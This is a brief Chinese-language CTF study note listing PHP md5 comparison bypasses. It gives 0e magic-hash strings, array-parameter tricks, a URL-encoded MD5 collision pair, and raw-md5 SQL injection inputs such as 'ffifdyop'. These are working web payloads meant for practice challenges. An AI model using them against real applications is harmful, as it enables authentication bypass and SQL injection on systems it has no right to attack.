前言

md5考点总结一下下，以后遇到新的考点再更新

正文

弱比较

if($a!=$b && md5($a)==md5($b))

#### 0e绕过：

QNKCDZO

s155964671a

s1091221200a

数组绕过：

payload：

?a[]=1&b[]=2

强比较

if($a!==$b && md5($a)===md5($b))

数组绕过：

payload：

?a[]=1&b[]=2

字符串强比较

if((string)$a!==(string)$b && md5($a)===md5($b))

payload：

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

sql绕过

$sql = "select * from score where stu_id='".md5($_GET[a],true)."'";

payload:

?a=ffifdyop //select * from score where stu_id=''or'6�]��!r,��b' 成功绕过
?a=129581926211651571912466741651878684928 //select * from score where stu_id='�T0D��o#��'or'8'  成功绕过